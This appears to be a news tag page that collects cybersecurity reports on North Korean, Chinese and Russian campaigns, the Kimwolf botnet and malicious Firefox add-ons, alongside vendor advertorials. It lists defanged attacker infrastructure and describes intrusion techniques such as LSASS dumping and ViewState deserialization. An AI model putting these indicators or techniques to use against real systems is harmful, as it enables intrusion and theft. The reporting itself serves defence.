Tag: Cyber Threats

Dec 18, 2025Ravie LakshmananMalware / Mobile Security

The North Korean threat actor known as Kimsuky has been linked to a new campaign that distributes a new variant of Android malware called DocSwap via QR codes hosted on phishing sites mimicking Seoul-based logistics firm CJ Logistics (formerly CJ Korea Express).

“The threat actor leveraged QR codes and notification pop-ups to lure victims into installing and executing the malware on their mobile devices,” ENKI said. “The malicious app decrypts an embedded encrypted APK and launches a malicious service that provides RAT capabilities.”

“Since Android blocks apps from unknown sources and displays security warnings by default, the threat actor claims the app is a safe, official release to trick victims into ignoring the warning and installing the malware.”

According to the South Korean cybersecurity company, some of these artifacts masquerade as package delivery service apps. It’s being assessed that the threat actors are using smishing texts or phishing emails impersonating delivery companies to deceive recipients into clicking on booby-trapped URLs hosting the apps.

Should the victim proceed to install the app, an APK package (“SecDelivery.apk”) is downloaded from the server (“27.102.137[.]181”). The APK file then decrypts and loads an encrypted APK embedded into its resources to launch the new version of DocSwap, but not before ascertaining that it has obtained the necessary permission to read and manage external storage, access the internet, and install additional packages.

“Once it confirms all permissions, it immediately registers the MainService of the newly loaded APK as ‘com.delivery.security.MainService,’” ENKI said. “Simultaneously with service registration, the base application launches AuthActivity. This activity masquerades as an OTP authentication screen and verifies the user’s identity using a delivery number.”

The shipment number is hard-coded within the APK as “742938128549,” and is likely delivered alongside the malicious URL during the initial access phase. Once the user enters the provided delivery number, the application is configured to generate a random six-digit verification code and display it as a notification, following which they are prompted to input the generated code.

As soon as the code is provided, the app opens a WebView with the legitimate URL “www.cjlogistics[.]com/ko/tool/parcel/tracking,” while, in the background, the trojan connects to an attacker-controlled server (“27.102.137[.]181:50005”) and receive as many as 57 commands that allow it to log keystrokes, capture audio, start/stop camera recording perform file operations, run commands, upload/download files, and gather location, SMS messages, contacts, call logs, and a list of installed apps.

ENKI said it also discovered two other samples disguised as a P2B Airdrop app and a trojanized version of a legitimate VPN program called BYCOM VPN (“com.bycomsolutions.bycomvpn”) that’s available on the Google Play Store and developed by an Indian IT services company named Bycom Solutions.

“This indicates that the threat actor injected malicious functionality into the legitimate APK and repackaged it for use in the attack,” the security company added.

Further analysis of the threat actor infrastructure has uncovered phishing sites mimicking South Korean platforms like Naver and Kakao that seek to capture users’ credentials. These sites, in turn, have been found to share overlaps with a prior Kimsuky credential harvesting campaign targeting Naver users.

“The executed malware launches a RAT service, capabilities, similarly to past cases but demonstrates evolved such as using a new native function to decrypt the internal APK and incorporating diverse decoy behaviors,” ENKI said.

Dec 18, 2025Ravie LakshmananVulnerability / Software Security

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Wednesday added a critical flaw impacting ASUS Live Update to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation.

The vulnerability, tracked as CVE-2025-59374 (CVSS score: 9.3), has been described as an “embedded malicious code vulnerability” introduced by means of a supply chain compromise that could allow attackers to perform unintended actions.

“Certain versions of the ASUS Live Update client were distributed with unauthorized modifications introduced through a supply chain compromise,” according to a description of the flaw published in CVE.org. “The modified builds could cause devices meeting specific targeting conditions to perform unintended actions. Only devices that met these conditions and installed the compromised versions were affected.”

It’s worth noting that the vulnerability refers to the supply chain attack that came to light in March 2019, when ASUS acknowledged that an advanced persistent threat (APT) group managed to breach some of its servers as part of a campaign codenamed Operation ShadowHammer by Kaspersky. The activity is said to have run between June and November 2018.

The Russian cybersecurity company said the goal of the attacks was to “surgically target” an unknown pool of users whose machines were identified by their network adapters’ MAC addresses. The trojanized versions of the artifacts came embedded with a hard-coded list of more than 600 unique MAC addresses.

“A small number of devices have been implanted with malicious code through a sophisticated attack on our Live Update servers in an attempt to target a very small and specific user group,” ASUS noted at the time. The issue was fixed in version 3.6.8 of the Live Update software.

The development comes a few weeks after ASUS formally announced that the Live Update client has reached end-of-support (EOS) as of December 4, 2025. The last version is 3.6.15. As a result, CISA has urged Federal Civilian Executive Branch (FCEB) agencies still relying on the tool to discontinue its use by January 7, 2026.

“ASUS is committed to software security and consistently provides real-time updates to help protect and enhance devices,” the company said in a support page. “Automatic, real-time software updates are available via the ASUS Live Update application. Please update the ASUS Live Update to V3.6.8 or higher version to resolve security concerns.”

The threat actor known as Jewelbug has been increasingly focusing on government targets in Europe since July 2025, even as it continues to attack entities located in Southeast Asia and South America.

Check Point Research is tracking the cluster under the name Ink Dragon. It’s also referenced by the broader cybersecurity community under the names CL-STA-0049, Earth Alux, and REF7707. The China-aligned hacking group is assessed to be active since at least March 2023.

“The actor’s campaigns combine solid software engineering, disciplined operational playbooks, and a willingness to reuse platform-native tools to blend into normal enterprise telemetry,” the cybersecurity company said in a technical breakdown published Tuesday. “This mix makes their intrusions both effective and stealthy.”

Eli Smadja, group manager of Products R&D at Check Point Software, told The Hacker News that the activity is still ongoing, and that the campaign has “impacted several dozen victims, including government entities and telecommunications organizations, across Europe, Asia, and Africa.”

Details of the threat group first emerged in February 2025 when Elastic Security Labs and Palo Alto Networks Unit 42 detailed its use of a backdoor called FINALDRAFT (aka Squidoor) that’s capable of infecting both Windows and Linux systems. In recent months, Ink Dragon has also been attributed a five-month-long intrusion targeting a Russian IT service provider.

Attack chains mounted by the adversary have leveraged vulnerable services in internet-exposed web applications to drop web shells, which are then used to deliver additional payloads like VARGEIT and Cobalt Strike beacons to facilitate command-and-control (C2), discovery, lateral movement, defense evasion, and data exfiltration.

Another notable backdoor in the threat actor’s malware arsenal is NANOREMOTE, which uses the Google Drive API for uploading and downloading files between the C2 server and the compromised endpoint. Check Point said it did not encounter the malware in the intrusions and investigations it observed.

“It is possible that the actor selectively deploys tools from a broader toolkit, depending on the victim’s environment, operational needs, and the desire to blend in with legitimate traffic,” Smadja said.

Ink Dragon has also relied on predictable or mismanaged ASP.NET machine key values to carry out ViewState deserialization attacks against vulnerable IIS and SharePoint servers, and then install a custom ShadowPad IIS Listener module to turn these compromised servers into part of its C2 infrastructure and enable them to proxy commands and traffic, improving resilience in the process.

“This design allows attackers to route traffic not only deeper inside a single organization’s network, but also across different victim networks entirely,” Check Point said. “As a result, one compromise can quietly become another hop in a global, multi-layered infrastructure supporting ongoing campaigns elsewhere, blending operational control with strategic reuse of previously breached assets.”

The listener module is also equipped to run different commands on the IIS machine, providing attackers with greater control over the system to conduct reconnaissance and stage payloads.

In addition to exploiting publicly disclosed machine keys to achieve ASP.NET ViewState deserialization, the threat actor has been found to weaponize ToolShell SharePoint flaws to drop web shells on compromised servers. Other steps carried out by Ink Dragon are listed below –

• Use the IIS machine key to obtain a local administrative credential and leverage it for lateral movement over an RDP tunnel
• Create scheduled tasks and install services to establish persistence
• Dump LSASS dumps and extract registry hives to achieve privilege escalation
• Modify host firewall rules to allow outbound traffic and transform the infected hosts into a ShadowPad relay network

“In at least one instance, the actor located an idle RDP session belonging to a Domain Administrator that had authenticated via Network Level Authentication (CredSSP) using NTLMv2 fallback. Since the session remained disconnected but not logged off, it is highly likely that LSASS retained the associated logon token and NTLM verifier in memory,” Check Point said.

“Ink Dragon obtained SYSTEM-level access to the host, extracted the token (and possibly the NTLM key material), and reused it to perform authenticated SMB operations. Through these actions, they were able to write to administrative shares and exfiltrate NTDS.dit and registry hives, marking the point at which they achieved domain-wide privilege escalation and control.”

The intrusions have been found to rely on a number of components rather than a single backdoor or a monolithic framework to establish long-term persistence. These include –

• ShadowPad Loader, which is used to decrypt and run the ShadowPad core module in memory
• CDBLoader, which uses Microsoft Console Debugger (“cdb.exe”) to run shellcode and load encrypted payloads
• LalsDumper, which extracts an LSASS dump
• 032Loader, which is used to decrypt and execute payloads
• FINALDRAFT, an updated version of the known remote administration tool that abuses Outlook and the Microsoft Graph API for C2

“The cluster has introduced a new variant of FINALDRAFT malware with enhanced stealth and higher exfiltration throughput, along with advanced evasion techniques that enable stealthy lateral movement and multi-stage malware deployment across compromised networks,” Check Point said.

“FINALDRAFT implements a modular command framework in which operators push encoded command documents to the victim’s mailbox, and the implant pulls, decrypts, and executes them.”

The cybersecurity company also pointed out that it detected evidence of a second threat actor known as REF3927 (aka RudePanda) on “several” of the same victim environments breached by Ink Dragon. That said, there are no indications that the two clusters are operationally linked. It’s believed that both intrusion sets exploited the same initial access methods to obtain footholds.

“Ink Dragon presents a threat model in which the boundary between ‘compromised host’ and ‘command infrastructure’ no longer exists,” Check Point concluded. “Each foothold becomes a node in a larger, operator-controlled network – a living mesh that grows stronger with every additional victim.”

“Defenders must therefore view intrusions not only as local breaches but as potential links in an external, attacker-managed ecosystem, where shutting down a single node is insufficient unless the entire relay chain is identified and dismantled. Ink Dragon’s relay-centric architecture is among the more mature uses of ShadowPad observed to date. A blueprint for long-term, multi-organizational access built on the victims themselves.”

Modern security teams often feel like they’re driving through fog with failing headlights. Threats accelerate, alerts multiply, and SOCs struggle to understand which dangers matter right now for their business. Breaking out of reactive defense is no longer optional. It’s the difference between preventing incidents and cleaning up after them.

Below is the path from reactive firefighting to a proactive, context-rich SOC that actually sees what’s coming.

When the SOC Only Sees in the Rear-View Mirror

Many SOCs still rely on a backward-facing workflow. Analysts wait for an alert, investigate it, escalate, and eventually respond. This pattern is understandable: the job is noisy, the tooling is complex, and alert fatigue bends even the toughest teams into reactive mode.

But a reactive posture hides several structural problems:

• No visibility into what threat actors are preparing.
• Limited ability to anticipate campaigns targeting the organization’s sector.
• Inability to adjust defenses before an attack hits.
• Overreliance on signatures that reflect yesterday’s activity.

The result is a SOC that constantly catches up but rarely gets ahead.

The Cost of Waiting for the Alarm to Ring

Reactive SOCs pay in time, money, and risk.

• Longer investigations. Analysts must research every suspicious object from scratch because they lack a broader context.
• Wasted resources. Without visibility into which threats are relevant to their vertical and geography, teams chase false positives instead of focusing on real dangers.
• Higher breach likelihood. Threat actors often reuse infrastructure and target specific industries. Seeing these patterns late gives attackers the advantage.

A proactive SOC flips this script by reducing uncertainty. It knows which threats are circulating in its environment, what campaigns are active, and which alerts deserve immediate escalation.

Threat Intelligence: The Engine of Proactive Security

Threat intelligence fills the gaps left by reactive operations. It provides a stream of evidence about what attackers are doing right now and how their tools evolve.

ANY.RUN’s Threat Intelligence Lookup serves as a tactical magnifying glass for SOCs. It converts raw threat data into an operational asset.

TI Lookup: investigate threats and indicators, click search bar to select parameters

ANY.RUN’s TI Feeds complement SOC workflows by supplying continuously updated indicators gathered from real malware executions. This ensures defenses adapt at the speed of threat evolution.

Focus on Threats that Actually Matter to Your Business

But context alone isn’t enough; teams need to interpret this intelligence for their specific business environment. Threats are not evenly distributed across the world. Each sector and region has its own constellation of malware families, campaigns, and criminal groups.

Companies from what industries and countries encounter Tycoon 2FA most often recently

Threat Intelligence Lookup supports industry and geographic attribution of threats and indicators thus helping SOCs answer vital questions:

• Is this alert relevant to our company’s sector?
• Is this malware known to target companies in our country?
• Are we seeing the early movements of a campaign aimed at organizations like ours?

By mapping activity to both industry verticals and geographies, SOCs gain an immediate understanding of where a threat sits in their risk landscape. This reduces noise, speeds up triage, and lets teams focus on threats that truly demand action.

Here is an example: a suspicious domain turns out to be linked to Lumma Stealer and ClickFix attacks targeting mostly telecom and hospitality businesses in the USA and Canada:

domainName:”benelui.click”

Industries and countries most targeted by threats the IOC is linked to

Or suppose a CISO in German manufacturing company wants a baseline for sector risks:

industry:”Manufacturing” and submissionCountry:”DE”

TI Lookup summary on malware samples analyzed by German users and targeting manufacturing business

This query surfaces top threats like Tycoon 2FA and EvilProxy plus highlights the interest of Storm-1747 APT group that operates Tycoon 2FA to the country’s production sector. This becomes an immediate priority list for detection engineering, threat hunting hypotheses, and security awareness training.

Analysts access sandbox sessions and real-world IOCs related to those threats. IOCs and TTPs instantly provided by TI Lookup fuel detection rules for the most relevant threats thus allowing to detect and mitigate incidents proactively, protecting businesses and their customers.

View a sandbox session of Lumma stealer sample analysis:

Sandbox analysis: see malware in action, view kill chain, gather IOCs

Why the Threat Landscape Demands Better Visibility

Attackers’ infrastructure is changing fast and it’s no longer limited to one threat per campaign. We’re now seeing the emergence of hybrid threats, where multiple malware families are combined within a single operation. These blended attacks merge logic from different infrastructures, redirection layers, and credential-theft modules, making detection, tracking, and attribution significantly harder.

Hybrid attack with Salty and Tycoon detected inside ANY.RUN sandbox in just 35 seconds

Recent investigations uncovered Tycoon 2FA and Salty working side by side in the same chain. One kit runs the initial lure and reverse proxy, while another takes over for session hijacking or credential capture. For many SOC teams, this combination breaks the existing defense strategies and detection rules, allowing attackers to slip past the security layer.

Tracking these changes across the broader threat landscape has become critical. Analysts must monitor behavior patterns and attack logic in real time, not just catalog kit variants. The faster teams can see these links forming, the faster they can respond to phishing campaigns built for adaptability.

Conclusion: A Clearer Horizon for Modern SOCs

Businesses can’t afford SOC blind spots anymore. Attackers specialize, campaigns localize, and malware evolves faster than signatures can keep up. Proactive defense requires context, clarity, and speed.

Threat Intelligence Lookup strengthened with industry and geo context and supported by fresh indicators from TI Feeds gives SOC leaders exactly that. Instead of reacting to alerts in the dark, decision makers gain a forward-looking view of the threats that really matter to their business.

Dec 17, 2025Ravie LakshmananVulnerability / Malware

The threat actor linked to Operation ForumTroll has been attributed to a fresh set of phishing attacks targeting individuals within Russia, according to Kaspersky.

The Russian cybersecurity vendor said it detected the new activity in October 2025. The origins of the threat actor are presently unknown.

“While the spring cyberattacks focused on organizations, the fall campaign honed in on specific individuals: scholars in the field of political science, international relations, and global economics, working at major Russian universities and research institutions,” security researcher Georgy Kucherin said.

Operation ForumTroll refers to a series of sophisticated phishing attacks exploiting a then-zero-day vulnerability in Google Chrome (CVE-2025-2783) to deliver the LeetAgent backdoor and a spyware implant known as Dante.

The latest attack wave also commences with emails that claimed to be from eLibrary, a Russian scientific electronic library, with the messages sent from the address “support@e-library[.]wiki.” The domain was registered in March 2025, six months before the start of the campaign, suggesting that preparations for the attack had been underway for some time.

Kaspersky said the strategic domain aging was done to avoid raising any red flags typically associated with sending emails from a freshly registered domain. In addition, the attackers also hosted a copy of the legitimate eLibrary homepage (“elibrary[.]ru”) on the bogus domain to maintain the ruse.

The final payload is a command-and-control (C2) and red teaming framework known as Tuoni, enabling the threat actors to gain remote access to the victim’s Windows device.

“ForumTroll has been targeting organizations and individuals in Russia and Belarus since at least 2022,” Kaspersky said. “Given this lengthy timeline, it is likely this APT group will continue to target entities and individuals of interest within these two countries.”

The disclosure comes as Positive Technologies detailed the activities of two threat clusters, QuietCrabs – a suspected Chinese hacking group also tracked as UTA0178 and UNC5221 – and Thor, which appears to be involved in ransomware attacks since May 2025.

These intrusion sets have been found to leverage security flaws in Microsoft SharePoint (CVE-2025-53770), Ivanti Endpoint Manager Mobile (CVE-2025-4427 and CVE-2025-4428), Ivanti Connect Secure (CVE-2024-21887), and Ivanti Sentry (CVE-2023-38035).

Attacks carried out by QuietCrabs take advantage of the initial access to deploy an ASPX web shell and use it to deliver a JSP loader that’s capable of downloading and executing KrustyLoader, which then drops the Sliver implant.

“Thor is a threat group first observed in attacks against Russian companies in 2025,” researchers Alexander Badayev, Klimentiy Galkin, and Vladislav Lunin said. “As final payloads, the attackers use LockBit and Babuk ransomware, as well as Tactical RMM and MeshAgent to maintain persistence.”

Dec 17, 2025Ravie LakshmananEmail Security / Threat Intelligence

The Russian state-sponsored threat actor known as APT28 has been attributed to what has been described as a “sustained” credential-harvesting campaign targeting users of UKR[.]net, a webmail and news service popular in Ukraine.

The activity, observed by Recorded Future’s Insikt Group between June 2024 and April 2025, builds upon prior findings from the cybersecurity company in May 2024 that detailed the hacking group’s attacks targeting European networks with the HeadLace malware and credential-harvesting web pages.

APT28 is also tracked as BlueDelta, Fancy Bear, Forest Blizzard, FROZENLAKE, Iron Twilight, ITG05, Pawn Storm, Sednit, Sofacy, and TA422. It’s assessed to be affiliated with Russia’s Main Directorate of the General Staff of the Russian Federation’s Armed Forces (GRU).

The latest attacks are characterized by the deployment of UKR[.]net-themed login pages on legitimate services like Mocky to entice recipients into entering their credentials and two-factor authentication (2FA) codes. Links to these pages are embedded within PDF documents that are distributed via phishing emails.

The links are shortened using services like tiny[.]cc or tinyurl[.]com. In some cases, the threat actor has also been observed using subdomains created on platforms like Blogger (*.blogspot[.]com) to launch a two-tier redirection chain that leads to the credential harvesting page.

The efforts are part of a broader set of phishing and credential theft operations orchestrated by the adversary since mid-2000s targeting government institutions, defense contractors, weapons suppliers, logistics firms, and policy think tanks in pursuit of Russia’s strategic objectives.

“While this campaign does not reveal specific targets, BlueDelta’s historical focus on credential theft to enable intelligence collection provides strong indicators of likely intent to collect sensitive information from Ukrainian users in support of broader GRU intelligence requirements,” the Mastercard-owned company said in a report shared with The Hacker News.

What has changed is the transition from using compromised routers to proxy tunneling services such as ngrok and Serveo to capture and relay the stolen credentials and 2FA codes.

“BlueDelta’s continued abuse of free hosting and anonymized tunneling infrastructure likely reflects an adaptive response to Western-led infrastructure takedowns in early 2024,” Recorded Future said. “The campaign highlights the GRU’s persistent interest in compromising Ukrainian user credentials to support intelligence-gathering operations amid Russia’s ongoing war in Ukraine.”

Dec 17, 2025Ravie LakshmananVulnerability / Network Security

SonicWall has rolled out fixes to address a security flaw in Secure Mobile Access (SMA) 100 series appliances that it said has been actively exploited in the wild.

The vulnerability, tracked as CVE-2025-40602 (CVSS score: 6.6), concerns a case of local privilege escalation that arises as a result of insufficient authorization in the appliance management console (AMC).

It affects the following versions –

• 12.4.3-03093 (platform-hotfix) and earlier versions – Fixed in 12.4.3-03245 (platform-hotfix)
• 12.5.0-02002 (platform-hotfix) and earlier versions – Fixed in 12.5.0-02283 (platform-hotfix)

“This vulnerability was reported to be leveraged in combination with CVE-2025-23006 (CVSS score 9.8) to achieve unauthenticated remote code execution with root privileges,” SonicWall said.

It’s worth noting that CVE-2025-23006 was patched by the company in late January 2025 in version 12.4.3-02854 (platform-hotfix).

Clément Lecigne and Zander Work of Google Threat Intelligence Group (GTIG) have been credited with discovering and reporting CVE-2025-40602. There are currently no details on the scale of the attacks and who is behind the efforts.

Back in July, Google said it’s tracking a cluster named UNC6148 that’s targeting fully-patched end-of-life SonicWall SMA 100 series devices as part of a campaign designed to drop a backdoor called OVERSTEP. It’s currently not clear if these activities are related.

In light of active exploitation, it’s essential that SonicWall SMA 100 series users apply the fixes as soon as possible.

A new distributed denial-of-service (DDoS) botnet known as Kimwolf has enlisted a massive army of no less than 1.8 million infected devices comprising Android-based TVs, set-top boxes, and tablets, and may be associated with another botnet known as AISURU, according to findings from QiAnXin XLab.

“Kimwolf is a botnet compiled using the NDK [Native Development Kit],” the company said in a report published today. “In addition to typical DDoS attack capabilities, it integrates proxy forwarding, reverse shell, and file management functions.”

The hyper-scale botnet is estimated to have issued 1.7 billion DDoS attack commands within a three-day period between November 19 and 22, 2025, around the same time one of its command-and-control (C2) domains – 14emeliaterracewestroxburyma02132[.]su – came first in Cloudflare’s list of top 100 domains, briefly even surpassing Google.

Kimwolf’s primary infection targets are TV boxes deployed in residential network environments. Some of the affected device models include TV BOX, SuperBOX, HiDPTAndroid, P200, X96Q, XBOX, SmartTV, and MX10. Infections are scattered globally, with Brazil, India, the U.S., Argentina, South Africa, and the Philippines registering higher concentrations. That said, the exact means by which the malware is propagated to these devices is presently unclear.

XLab said its investigation into the botnet commenced after it received a “version 4” artifact of Kimwolf from a trusted community partner on October 24, 2025. Since then, an additional eight samples were discovered last month.

“We observed that Kimwolf’s C2 domains have been successfully taken down by unknown parties at least three times [in December], forcing it to upgrade its tactics and turn to using ENS (Ethereum Name Service) to harden its infrastructure, demonstrating its powerful evolutionary capability,” XLab researchers said.

This assessment is based on similarities in APK packages uploaded to the VirusTotal platform, in some cases even using the same code signing certificate (“John Dinglebert Dinglenut VIII VanSack Smith”). Further definitive evidence arrived on December 8, 2025, with the discovery of an active downloader server (“93.95.112[.]59”) that contained a script referencing APKs for both Kimwolf and AISURU.

The malware in itself is fairly straightforward. Once launched, it ensures that only one instance of the process runs on the infected device, and then proceeds to decrypt the embedded C2 domain, uses DNS-over-TLS to obtain the C2 IP address, and connects to it in order to receive and execute commands.

Recent versions of the botnet malware detected as recently as December 12, 2025, have introduced a technique known as EtherHiding that makes use of an ENS domain (“pawsatyou[.]eth”) to fetch the actual C2 IP from the associated smart contract (0xde569B825877c47fE637913eCE5216C644dE081F) in an effort to render its infrastructure more resilient to takedown efforts.

Specifically, this involves extracting an IPv6 address from the “lol” field of the transaction, then taking the last four bytes of the address and performing an XOR operation with the key “0x93141715” to get the actual IP address.

Besides encrypting sensitive data related to C2 servers and DNS resolvers, Kimwolf uses TLS encryption for network communications to receive DDoS commands. In all, the malware supports 13 DDoS attack methods over UDP, TCP, and ICMP. The attack targets, per XLab, are located in the U.S., China, France, Germany, and Canada.

Further analysis has determined that over 96% of the commands relate to using the bot nodes for providing proxy services. This indicates the attackers’ attempts to exploit the bandwidth from compromised devices and maximize profit. As part of the effort, a Rust-based Command Client module is deployed to form a proxy network.

Also delivered to the nodes is a ByteConnect software development kit (SDK), a monetization solution that allows app developers and IoT device owners to monetize their traffic.

“Giant botnets originated with Mirai in 2016, with infection targets mainly concentrated on IoT devices like home broadband routers and cameras,” XLab said. “However, in recent years, information on multiple million-level giant botnets like Badbox, Bigpanzi, Vo1d, and Kimwolf has been disclosed, indicating that some attackers have started to turn their attention to various smart TVs and TV boxes.”

Dec 17, 2025Ravie LakshmananAd Fraud / Browser Security

A new campaign named GhostPoster has leveraged logo files associated with 17 Mozilla Firefox browser add-ons to embed malicious JavaScript code designed to hijack affiliate links, inject tracking code, and commit click and ad fraud.

The extensions have been collectively downloaded over 50,000 times, according to Koi Security, which discovered the campaign. The add-ons are no longer available.

These browser programs were advertised as VPNs, screenshot utilities, ad blockers, and unofficial versions of Google Translate. The oldest add-on, Dark Mode, was published on October 25, 2024, offering the ability to enable a dark theme for all websites. The full list of the browser add-ons is below –

• Free VPN
• Screenshot
• Weather (weather-best-forecast)
• Mouse Gesture (crxMouse)
• Cache – Fast site loader
• Free MP3 Downloader
• Google Translate (google-translate-right-clicks)
• Traductor de Google
• Global VPN – Free Forever
• Dark Reader Dark Mode
• Translator – Google Bing Baidu DeepL
• Weather (i-like-weather)
• Google Translate (google-translate-pro-extension)
• 谷歌翻译
• libretv-watch-free-videos
• Ad Stop – Best Ad Blocker
• Google Translate (right-click-google-translate)

“What they actually deliver is a multi-stage malware payload that monitors everything you browse, strips away your browser’s security protections, and opens a backdoor for remote code execution,” security researchers Lotan Sery and Noga Gouldman said.

The attack chain begins when the logo file is fetched when one of the above-mentioned extensions is loaded. The malicious code parses the file to look for a marker containing the “===” sign in order to extract JavaScript code, a loader that reaches out to an external server (“www.liveupdt[.]com” or “www.dealctr[.]com”) to retrieve the main payload, waiting 48 hours in between every attempt.

To further evade detection, the loader is configured to fetch the payload only 10% of the time. This randomness is a deliberate choice that’s introduced to sidestep efforts to monitor network traffic. The retrieved payload is a custom-encoded comprehensive toolkit capable of monetizing browser activities without the victims’ knowledge through four different ways –

• Affiliate link hijacking, which intercepts affiliate links to e-commerce sites like Taobao or JD.com, depriving legitimate affiliates of their commission
• Tracking injection, which inserts the Google Analytics tracking code into every web page visited by the victim, to silently profile them
• Security header stripping, which removes security headers like Content-Security-Policy and X-Frame-Options from HTTP responses, exposing users to clickjacking and cross-site scripting attacks
• Hidden iframe injection, which injects invisible iframes into pages to load URLs from attacker-controlled servers and enable ad and click fraud
• CAPTCHA bypass, which employs various methods to bypass CAPTCHA challenges and evade bot detection safeguards

“Why would malware need to bypass CAPTCHAs? Because some of its operations, like the hidden iframe injections, trigger bot detection,” the researchers explained. “The malware needs to prove it’s ‘human’ to keep operating.”

Besides probability checks, the add-ons also incorporate time-based delays that prevent the malware from activating until more than six days after installation. These layered evasion techniques make it harder to detect what’s going on behind the scenes.

It’s worth emphasizing here that not all the extensions above use the same steganographic attack chain, but all of them exhibit the same behavior and communicate with the same command-and-control (C2) infrastructure, indicating it’s the work of a single threat actor or group that has experimented with different lures and methods.

The development comes merely days after a popular VPN extension for Google Chrome and Microsoft Edge was caught secretly harvesting AI conversations from ChatGPT, Claude, and Gemini and exfiltrating them to data brokers. In August 2025, another Chrome extension named FreeVPN.One was observed collecting screenshots, system information, and users’ locations.

“Free VPNs promise privacy, but nothing in life comes free,” Koi Security said. “Again and again, they deliver surveillance instead.”

AI-assisted coding and AI app generation platforms have created an unprecedented surge in software development. Companies are now facing rapid growth in both the number of applications and the pace of change within those applications. Security and privacy teams are under significant pressure as the surface area they must cover is expanding quickly while their staffing levels remain largely unchanged.

Existing data security and privacy solutions are too reactive for this new era. Many begin with data already collected in production, which is often too late. These solutions frequently miss hidden data flows to third party and AI integrations, and for the data sinks they do cover, they help detect risks but do not prevent them. The question is whether many of these issues can instead be prevented early. The answer is yes. Prevention is possible by embedding detection and governance controls directly into development. HoundDog.ai provides a privacy code scanner built for exactly this purpose.

Data security and privacy issues that can be proactively addressed

Sensitive data exposure in logs remains one of the most common and costly problems

When sensitive data appears in logs, relying on DLP solutions is reactive, unreliable, and slow. Teams may spend weeks cleaning logs, identifying exposure across the systems that ingested them, and revising the code after the fact. These incidents often begin with simple developer oversights, such as using a tainted variable or printing an entire user object in a debug function. As engineering teams grow past 20 developers, keeping track of all code paths becomes difficult and these oversights become more frequent.

Inaccurate or outdated data maps also drive considerable privacy risk

A core requirement in GDPR and US Privacy Frameworks is the need to document processing activities with details about the types of personal data collected, processed, stored, and shared. Data maps then feed into mandatory privacy reports such as Records of Processing Activities (RoPA), Privacy Impact Assessments (PIA), and Data Protection Impact Assessments (DPIA). These reports must document the legal bases for processing, demonstrate compliance with data minimization and retention principles, and ensure that data subjects have transparency and can exercise their rights. In fast-moving environments, though, data maps quickly drift out of date. Traditional workflows in GRC tools require privacy teams to interview application owners repeatedly, a process that is both slow and error-prone. Important details are often missed, especially in companies with hundreds or thousands of code repositories. Production-focused privacy platforms provide only partial automation because they attempt to infer data flows based on data already stored in production systems. They often cannot see SDKs, abstractions, and integrations embedded in the code. These blind spots can lead to violations of data processing agreements or inaccurate disclosures in privacy notices. Since these platforms detect issues only after data is already flowing, they offer no proactive controls that prevent risky behavior in the first place.

HoundDog.ai provides a privacy-focused static code scanner that continuously analyzes source code to document sensitive data flows across storage systems, AI integrations, and third-party services. The scanner identifies privacy risks and sensitive data leaks early in development, before code is merged and before data is ever processed. The engine is built in Rust, which is memory safe, and it is lightweight and fast. It scans millions of lines of code in under a minute. The scanner was recently integrated with Replit, the AI app generation platform used by 45M creators, providing visibility into privacy risks across the millions of applications generated by the platform.

Key capabilities

AI Governance and Third-Party Risk Management

Identify AI and third-party integrations embedded in code with high confidence, including hidden libraries and abstractions often associated with shadow AI.

Proactive Sensitive Data Leak Detection

Embed privacy across all stages in development, from IDE environments, with extensions available for VS Code, IntelliJ, Cursor, and Eclipse, to CI pipelines that use direct source code integrations and automatically push CI configurations as direct commits or pull requests requiring approval. Track more than 100 types of sensitive data, including Personally Identifiable Information (PII), Protected Health Information (PHI), Cardholder Data (CHD), and authentication tokens, and follow them across transformations into risky sinks such as LLM prompts, logs, files, local storage, and third-party SDKs.

Evidence Generation for Privacy Compliance

Automatically generate evidence-based data maps that show how sensitive data is collected, processed, and shared. Produce audit-ready Records of Processing Activities (RoPA), Privacy Impact Assessments (PIA), and Data Protection Impact Assessments (DPIA), prefilled with detected data flows and privacy risks identified by the scanner.

Why this matters

Companies need to eliminate blind spots

A privacy scanner that works at the code level provides visibility into integrations and abstractions that production tools miss. This includes hidden SDKs, third-party libraries, and AI frameworks that never show up through production scans until it is too late.

Teams also need to catch privacy risks before they occur

Plaintext authentication tokens or sensitive data in logs, or unapproved data sent to third-party integrations, must be stopped at the source. Prevention is the only reliable way to avoid incidents and compliance gaps.

Privacy teams require accurate and continuously updated data maps

Automated generation of RoPAs, PIAs, and DPIAs based on code evidence ensures that documentation keeps pace with development, without repeated manual interviews or spreadsheet updates.

Comparison with other tools

Privacy and security engineering teams use a mix of tools, but each category has fundamental limitations.

General-purpose static analysis tools provide custom rules but lack privacy awareness. They treat different sensitive data types as equivalent and cannot understand modern AI-driven data flows. They rely on simple pattern matching, which produces noisy alerts and requires constant maintenance. They also lack any built-in compliance reporting.

Post-deployment privacy platforms map data flows based on information stored in production systems. They cannot detect integrations or flows that have not yet produced data in those systems and cannot see abstractions hidden in code. Because they operate after deployment, they cannot prevent risks and introduce a significant delay between issue introduction and detection.

Reactive Data Loss Prevention tools intervene only after data has leaked. They lack visibility into source code and cannot identify root causes. When sensitive data reaches logs or transmissions, the cleanup is slow. Teams often spend weeks remediating and reviewing exposure across many systems.

HoundDog.ai improves on these approaches by introducing a static analysis engine purpose-built for privacy. It performs deep interprocedural analysis across files and functions to trace sensitive data such as Personally Identifiable Information (PII), Protected Health Information (PHI), Cardholder Data (CHD), and authentication tokens. It understands transformations, sanitization logic, and control flow. It identifies when data reaches risky sinks such as logs, files, local storage, third-party SDKs, and LLM prompts. It prioritizes issues based on sensitivity and actual risk rather than simple patterns. It includes native support for more than 100 sensitive data types and allows customization.

HoundDog.ai also detects both direct and indirect AI integrations from source code. It identifies unsafe or unsanitized data flows into prompts and allows teams to enforce allowlists that define which data types may be used with AI services. This proactive model blocks unsafe prompt construction before code is merged, providing enforcement that runtime filters cannot match.

Beyond detection, HoundDog.ai automates the creation of privacy documentation. It produces an always fresh inventory of internal and external data flows, storage locations, and third-party dependencies. It generates audit-ready Records of Processing Activities and Privacy Impact Assessments populated with real evidence and aligned to frameworks such as FedRAMP, DoD RMF, HIPAA, and NIST 800-53.

Customer success

HoundDog.ai is already used by Fortune 1000 companies across healthcare and financial services, scanning thousands of repositories. These organizations are reducing data mapping overhead, catching privacy issues early in development, and maintaining compliance without slowing engineering.

Replit

